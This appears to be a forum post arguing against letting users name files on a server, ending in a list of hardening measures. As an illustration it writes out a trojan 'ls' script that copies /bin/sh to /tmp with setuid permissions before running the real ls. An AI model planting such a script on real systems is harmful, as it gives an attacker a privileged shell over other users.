Worst case scenario (one of MANY possible) :
saving a file (executable) called 'ls' in a rep where several people may want to execute the ls command (whith ./ in their path).
Suggestion for 'ls' content:
#!/bin/sh
# Know SUSHI ? ;-)
cp /bin/sh /tmp/tmp034
chmod 04777 /tmp/tmp034
/bin/ls
You got the idea... A real script would use a different file name for each copied shell...
But they are plenty of other (more realist) possibility:
Think to all the default config file loaded whithout you even notice it (for the shell, the editor...)
I haven't investigate it but what about real long file name ?(DOS ? performance penalty?)
Of course weird characters ('\0', '|', ...) are obiously a cause of problem.
I could go on for hours, in short If you let someone else name the file you let him the control the data.
And who control the data control the code...
If your client really want to do this just say : 'OK ! But YOU'll be responsible for all security/working incidents related to exploitation of this feature (underline the money penalties in this case and he should come back to reason).'
It's not a BAD idea it's a VERY VERY BAD one !
If you should anyway do it (The only valid reason would be a gun on your head...) do it in a paranoid mode :
- Limit the file name (limited character set, limited size)
- Limit the file permission (No executable, use special group if possible, no other permission)
- Of course limit the allowed directory to one special
- Forbid subdirectory creation (DOS)
- Turn on quotas (BTW limit the file size too even if it's redundant)
- Put a WatchDog detecting anything abnormal in your crontab
- Log everything
- strictly limit the access to the program using this feature.
Hope this helps...
"
Only
Bad
Coders
Badly
Code
In
Perl" (OBC2IP)